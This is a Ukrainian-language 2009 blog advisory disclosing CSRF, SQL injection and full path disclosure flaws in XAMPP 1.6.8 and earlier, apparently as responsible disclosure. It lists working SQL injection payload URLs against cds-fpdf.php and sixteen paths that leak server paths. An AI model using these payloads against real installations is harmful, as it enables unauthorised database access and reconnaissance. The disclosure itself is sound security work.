CSRF, SQL Injection та Full path disclosure уразливості в XAMPP
19:23 08.08.200901.07.2009
У червні, 27.06.2009, я знайшов Cross-Site Request Forgery, SQL Injection та Full path disclosure уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.
Раніше я вже писав про уразливості в XAMPP.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
08.08.2009
CSRF:
http://site/xampp/cds-fpdf.php
Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.
SQL Injection:
http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals on)
http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1
http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)
http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq off)
Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.
Full path disclosure:
http://site/xampp/external/ps/draw.php
http://site/xampp/external/ps/hyperlinks.php
http://site/xampp/external/ps/image.php
http://site/xampp/external/ps/overprint.php
http://site/xampp/external/ps/ps.php?submit=OK
http://site/xampp/external/ps/shading.php
http://site/xampp/external/ps/spotcolor.php
http://site/xampp/external/ps/text.php
http://site/xampp/special/ps/draw.php
http://site/xampp/special/ps/hyperlinks.php
http://site/xampp/special/ps/image.php
http://site/xampp/special/ps/overprint.php
http://site/xampp/special/ps/ps.php?submit=OK
http://site/xampp/special/ps/shading.php
http://site/xampp/special/ps/spotcolor.php
http://site/xampp/special/ps/text.php
Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).
